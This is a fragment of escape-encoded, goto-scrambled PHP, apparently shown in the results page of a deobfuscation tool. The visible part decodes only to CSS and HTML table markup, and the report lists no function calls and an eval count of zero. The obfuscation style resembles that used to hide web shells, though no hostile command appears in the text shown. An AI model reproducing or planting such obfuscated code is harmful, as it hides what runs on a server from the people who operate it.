141\144\x69\165\163\72\40\x35\x70\x78\73\12\11\x2d\167\145\x62\x6b\x69\x74\55\142\x6f\162\144\145\162\x2d\x72\141\x64\151\165\x73\72\x35\x70\170\x3b\12\x9\142\157\x72\144\145\162\55\162\x61\144\151\x75\163\72\x35\160\x78\x3b\xa\x9\x7d\12\x2e\143\154\157\163\145\x20\x7b\12\11\157\166\145\162\x66\154\157\167\x3a\x20\x61\165\164\157\x3b\xa\x9\142\x6f\162\x64\x65\162\x3a\40\61\160\x78\x20\x73\x6f\x6c\x69\144\40\x6c\151\155\x65\x3b\12\11\x62\x61\x63\153\147\162\157\165\156\x64\x3a\40\x6c\x69\x6d\145\x3b\xa\11\143\157\154\x6f\x72\x3a\x20\x77\150\x69\164\x65\x3b\xa\11\175\12\x2e\x72\x20\173\12\11\146\154\x6f\x61\164\x3a\x20\162\151\x67\x68\x74\x3b\12\11\x74\x65\170\164\55\x61\154\x69\x67\156\x3a\40\x72\151\147\x68\x74\73\12\11\175\12\x3c\57\163\x74\171\x6c\x65\76\xa\12\x3c\102\117\104\131\x3e\12\xa\74\x74\x61\x62\x6c\x65\40\x77\151\x64\164\x68\x3d\42\71\x35\45\42\x20\142\x6f\162\x64\145\x72\x3d\42\60\x22\40\x63\x65\154\154\x70\141\x64\144\151\156\x67\75\42\60\42\40\143\x65\154\154\x73\x70\x61\143\151\x6e\147\x3d\42\x30\x22\x20\x61\x6c\x69\147\156\75\42\x6c\x65\146\x74\42\x3e\xa\74\x74\x72\76\74\164\x64\76"; goto Q6Hbw; qeUe4: 
 ?>

Function Calls

None

Variables

None

Stats

MD5 42f3f6c3b8174c63ecc8df7b4ee820f1
Eval Count 0
Decode Time 77 ms